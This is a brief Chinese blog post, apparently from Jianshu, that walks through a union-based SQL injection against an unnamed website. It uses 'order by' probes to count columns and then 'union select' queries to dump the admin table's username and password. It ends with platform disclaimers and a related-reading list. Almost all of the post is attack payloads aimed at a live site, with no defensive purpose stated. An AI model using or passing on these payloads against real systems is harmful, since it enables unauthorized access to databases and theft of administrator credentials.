注入

首先,在網(wǎng)站后面?? order by11(數(shù)字可以隨意),以此來判斷字段數(shù)目(比如剛開始注入11,載入成功,在注入12,失敗,那就是11)


同樣添加語(yǔ)句【order by 12】頁(yè)面報(bào)錯(cuò),所以此站字段長(zhǎng)度為11

然后,在鏈接后面添加語(yǔ)句【union select 1,2,3,4,5,6,7,8,9,10,11 from admin(表名)】,進(jìn)行聯(lián)合查詢,來暴露可查詢的字段編號(hào)。


在連接后面添加語(yǔ)句【union select 1,admin,password,4,5,6,7,8,9,10,11 from admin】,即可暴出管理員用戶名和密碼

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 姓名:于川皓 學(xué)號(hào):16140210089 轉(zhuǎn)載自:https://baike.baidu.com/item/sq...
    道無涯_cc76閱讀 2,047評(píng)論 0 2
  • Sql注入定義: 就是通過把sql命令插入到web表單提交或輸入域名或頁(yè)面請(qǐng)求的查詢字符串,最終達(dá)到欺騙服務(wù)器執(zhí)行...
    付出從未后悔閱讀 760評(píng)論 0 3
  • SQL注入 概念 危害 原理 實(shí)例 防御 基礎(chǔ) - ### SQL語(yǔ)句所用符號(hào)不同數(shù)據(jù)庫(kù)的sql注入與提權(quán)常見S...
    yddchsc君閱讀 1,502評(píng)論 1 10
  • 五一節(jié),我在院子里等親戚回來。天下著蒙蒙細(xì)雨,偶一抬頭,遠(yuǎn)遠(yuǎn)的一幕映入眼簾:一位婦女推著拉菜的三輪自行車在吃力地爬...
    蜜蜂郎馬成欣閱讀 157評(píng)論 1 7
  • 這段時(shí)間正在思考學(xué)習(xí)與生活,因?yàn)榻?jīng)過半年的寫作和學(xué)英語(yǔ),確實(shí)目前看不到有多大的進(jìn)步和績(jī)效,生活中又有很多事情...
    簡(jiǎn)素七年閱讀 229評(píng)論 0 0

友情鏈接更多精彩內(nèi)容